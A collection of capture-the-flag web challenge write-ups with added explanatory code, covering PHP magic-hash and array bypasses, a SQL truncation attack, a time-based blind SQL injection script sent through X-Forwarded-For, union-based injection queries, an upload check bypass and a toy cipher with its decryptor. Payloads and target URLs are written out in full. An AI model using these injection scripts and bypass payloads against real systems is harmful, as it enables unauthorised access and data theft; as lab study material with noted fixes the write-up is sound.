A loose md5 comparison plus a strcmp() bypass: v1=240610708 and v2=QNKCDZO are different strings whose md5 digests both have the form 0e<digits>, which == compares as the numbers 0 == 0; v3[]= makes strcmp() receive an array, which returns NULL with a warning on PHP 5/7, and !NULL is true. (PHP 8 throws a TypeError for strcmp(array, string), so only the md5 half survives there.)

http://118.89.219.210:49162/index.php?v1=240610708&v2=QNKCDZO&v3[]=

SKCTF{Php_1s_tH3_B3St_L4NgUag3}


0x31. login1 (SKCTF)

Searching for "SQL constraint attack" turns up the following:

Note that when executing a SELECT query, SQL does not shorten the string to 25 characters. So the search uses the full string and finds no match. Then, when the INSERT query runs, only the first 25 characters are inserted.

So we only need to register an account whose name is admin padded with spaces to more than 25 characters; logging in with it returns admin's data.

SKCTF{4Dm1n_HaV3_GreAt_p0w3R}
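A toy model of the attack, added here and not part of the writeup: MySQL in non-strict SQL mode silently truncates a VARCHAR(25) on INSERT, and its PAD SPACE collations ignore trailing spaces on comparison; both behaviours are emulated in Python so the registration check and the later login can be followed step by step. The table layout and the 25-character width come from the quoted explanation, not from the challenge's real schema.

```python
COLUMN_WIDTH = 25          # assumed VARCHAR(25) on the username column


def pad_space_equal(a, b):
    """MySQL PAD SPACE comparison (e.g. utf8_general_ci): trailing spaces ignored."""
    return a.rstrip(' ') == b.rstrip(' ')


class ToyUsers:
    """Tiny stand-in for the users table and the app logic around it."""

    def __init__(self, strict_mode=False):
        self.rows = []                 # (username, password)
        self.strict = strict_mode      # STRICT_TRANS_TABLES, the default since MySQL 5.7

    def select(self, username):
        return [r for r in self.rows if pad_space_equal(r[0], username)]

    def insert(self, username, password):
        if len(username) > COLUMN_WIDTH:
            if self.strict:
                raise ValueError('Data too long for column')   # strict mode rejects
            username = username[:COLUMN_WIDTH]                 # non-strict: silent cut
        self.rows.append((username, password))

    def register(self, username, password):
        """The app's duplicate check: SELECT with the full string, then INSERT."""
        if self.select(username):
            return False
        self.insert(username, password)
        return True

    def login(self, username, password):
        """Any row matching the name under PAD SPACE rules may carry the password."""
        return any(r[1] == password for r in self.select(username))


def attacker_name():
    """'admin' + 20 spaces + 'x': 26 chars, so SELECT finds nothing, INSERT keeps 'admin' + spaces."""
    return 'admin' + ' ' * 20 + 'x'
```

The durable fixes are the strict SQL mode (so the INSERT fails instead of truncating), a UNIQUE constraint on the username column, and normalising the name before both the check and the insert.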


0x32. Where are you from (你从哪里来)

are you from google?

Add a Referer header:

Referer: https://www.google.com

flag{bug-ku_ai_admin}


0x33. md5 collision

$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
    echo "nctf{*****************}";
} else {
    echo "false!!!";
}}
else{echo "please input a";}

A loose md5 comparison: md5('QNKCDZO') is 0e830400451993494058024219903391 and md5('240610708') is 0e462097431906509019562988736854. Both are numeric strings of the form 0e<digits>, so == compares them as 0 == 0, which is true, while the plaintexts differ.

http://120.24.86.145:9009/md5.php?a=240610708

flag{md5_collision_is_easy}
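The magic-hash trick used here and in 前女友 above, checked offline as an added example (not code from the writeup): hashlib confirms the digests, and a small emulation of PHP 7's string == string rule shows why two different 0e digests compare equal. The candidate list is the two strings from this page plus s878926199a, another widely published one; nothing is computed against a live target.

```python
import hashlib
import re

# PHP numeric-string grammar (PHP 7 view, leading whitespace allowed).
_NUMERIC = re.compile(r'^\s*[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?$')


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_hash(h):
    """A digest PHP reads as 0 x 10^N: '0e' followed by digits only."""
    return re.fullmatch(r'0e\d+', h) is not None


def php_loose_eq_str(a, b):
    """`$a == $b` for two strings: numeric on both sides means float compare,
    which is what makes 0e830... equal to 0e462.... Otherwise plain equality."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def find_magic_pairs(candidates):
    """Every pair of candidates whose md5 digests loosely compare equal."""
    magic = [c for c in candidates if is_magic_hash(md5_hex(c))]
    return [(x, y) for x in magic for y in magic if x < y]
```

The fix on the PHP side is a strict comparison (===) or hash_equals(); with either, 0e830... and 0e462... are just two different 32-character strings.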


0x34. Assorted bypasses (各种绕过)

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])
        print 'passwd can not be uname.';
    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))
        die('Flag: '.$flag);
    else
        print 'sorry!';
}
?>

A sha1() bypass: sha1() of an array returns false with a warning on PHP 5/7, so two different arrays give false === false while $_GET['uname'] == $_POST['passwd'] is still false; id=margin satisfies the other half (it is urldecode()d again, so plain text is fine). PHP 8 throws a TypeError for sha1(array).

http://120.24.86.145:8002/web7/?uname[]=1&id=margin
post:passwd[]=2

flag{HACK_45hhs_213sDD}


0x35. web8

<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

extract($_GET) turns every query parameter into a variable and, by default (EXTR_OVERWRITE), overwrites variables that already exist. fn=php://input makes file_get_contents() read the POST body, and ac=1 with a body of 1 satisfies $ac === $f. (The same overwrite would let a ?flag= parameter clobber $flag itself, which is why extract() on user input is dangerous in general.)

http://120.24.86.145:8002/web8/?fn=php://input&ac=1
post:1

flag{3cfb7a90fc0de31}


0x36. Be careful (细心)

Nothing visible on the page.
Out of habit, check robots.txt, which lists resul1.php.
Key code:

if ($_GET[x]==$password)

The hint says to become admin.
payload:x=admin

flag(ctf_0098_lkji-s)


0x36. Get a shell (求getshell)

My name is margin,give me a image file not a php

An upload form.
The hint asks for an image and mentions php, so the extension is checked.
Changing the extension alone does not get through.
The request-level header Content-Type: multipart/form-data is matched case-sensitively: changing it to Content-Type: Multipart/form-data
slips past the check and the flag comes back.

KEY{bb35dc123820e}


0x37. INSERT INTO injection

error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];
}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

I don't fully understand this one,
so I quote my schoolmate l1k3r's writeup directly:
From the code this should be an X_FORWARDED_FOR injection, but the comma , is filtered. With the comma filtered, if() cannot be used; MySQL has another construct besides if with the same function:

select case when xxx then xxx else xxx end;

And because , is filtered, substr/substring with comma arguments cannot be used either, but from 1 for 1 can replace them. The final payload:

11'+(select case when substr((select flag from flag) from 1 for 1)='a' then sleep(5) else 0 end))%23
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
import string

mystring = string.ascii_letters + string.digits
url = 'http://120.24.86.145:8002/web15/'
# {0}/{1} are filled by format(): character position and candidate character
data = "127.0.0.1'+(select case when (substring((select flag from flag) from {0} for 1)='{1}') then sleep(5) else 1 end) and '1'='1"
flag = ''

for i in range(1, 35):
    for j in mystring:
        try:
            headers = {'x-forwarded-for': data.format(str(i), j)}
            res = requests.get(url, headers=headers, timeout=3)
        except requests.exceptions.ReadTimeout:
            # sleep(5) outran the 3-second timeout, so this character is correct
            flag += j
            print(flag)
            break

print('The final flag:' + flag)

The idea of the code is to append a true/false condition to 127.0.0.1: when the condition is true the sleep(5) fires and the request runs past the timeout, so the except branch below records the character.

flag{cdbf14c9551d5be5612f7bb5d2867853}


0x38. A magical login form (这是一个神奇的登陆框)

admin_name=yu" order by 3#&admin_passwd=1111&submit=GO+GO+GO

An error: injectable.

admin_name=yu" order by 2#&admin_passwd=1111&submit=GO+GO+GO   #confirms 2 columns
admin_name=yu" union select database(),2#&admin_passwd=1111&submit=GO+GO+GO  #database name bugkusql1
admin_name=yu" union select table_name,2 from information_schema.tables where table_schema='bugkusql1'#&admin_passwd=1111&submit=GO+GO+GO   #table name flag1
admin_name=yu" union select column_name,2 from information_schema.columns where table_name='flag1'#&admin_passwd=1111&submit=GO+GO+GO   #column name flag1
admin_name=yu" union select flag1,2 from flag1#&admin_passwd=1111&submit=GO+GO+GO  #reads the flag

flag{ed6b28e684817d9efcaf802979e57aea}


0x39. Many times (多次)

Learned XOR-based probing from a senior: it tells you which words the page filters.
Append '^(length('union')!=0)^' to id=1. If the filter strips union, length('') is 0, the inner condition is 0 and 1^0^0 = 1, so the page renders normally; if union survives, length is 5, the condition is 1 and 1^1^0 = 0, so the page changes. A normal page therefore means union was filtered.
I don't know how to finish this one yet; skipping it for now.


0x40. PHP_encrypt_1 (ISCCCTF)

<?php
function encrypt($data,$key)
{
    $key = md5('ISCC');          // the $key argument is ignored: the key is always md5('ISCC')
    $x = 0;
    $len = strlen($data);
    $klen = strlen($key);
    $char = '';
    $str = '';
    for ($i=0; $i < $len; $i++) {   // repeat the key until it covers the plaintext
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];
        $x+=1;
    }
    for ($i=0; $i < $len; $i++) {   // add each plaintext byte to its key byte modulo 128
        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
    }
    return base64_encode($str);
}
?>

The post stops here. The function adds each plaintext byte to a byte of md5('ISCC') (cycled) modulo 128 and base64-encodes the result.
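Since the writeup ends at the source, here is an added example (mine, not from the post) with the same cipher in Python and its inverse: subtracting the same key byte modulo 128 undoes the addition, which is unambiguous as long as the plaintext is 7-bit ASCII, as flags are. The sample plaintext is constructed; the real ciphertext is whatever the challenge hands out.

```python
import base64
import hashlib

# Same key as the PHP: the 32 ASCII hex characters of md5('ISCC').
KEY = hashlib.md5(b'ISCC').hexdigest().encode()


def encrypt(data: bytes, key: bytes = KEY) -> str:
    """Port of the PHP encrypt(): byte-wise (p + k) % 128, then base64."""
    out = bytes((d + key[i % len(key)]) % 128 for i, d in enumerate(data))
    return base64.b64encode(out).decode()


def decrypt(token: str, key: bytes = KEY) -> bytes:
    """Inverse: base64-decode, then (c - k) % 128 with the same cycled key.
    Only exact for plaintext bytes below 128, which the modulus already assumes."""
    raw = base64.b64decode(token)
    return bytes((c - key[i % len(key)]) % 128 for i, c in enumerate(raw))


def is_seven_bit(data: bytes) -> bool:
    """Precondition check: the cipher is only invertible for 7-bit plaintext."""
    return all(b < 128 for b in data)
```

Feeding the challenge's base64 string to decrypt() recovers the plaintext; anything that decrypts to bytes outside printable ASCII means the key assumption (md5('ISCC')) does not hold for that ciphertext.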


Written by saltyfishyu under the Creative Commons Attribution 3.0 licence; it may be freely reposted and quoted provided the author is credited and the source is linked.
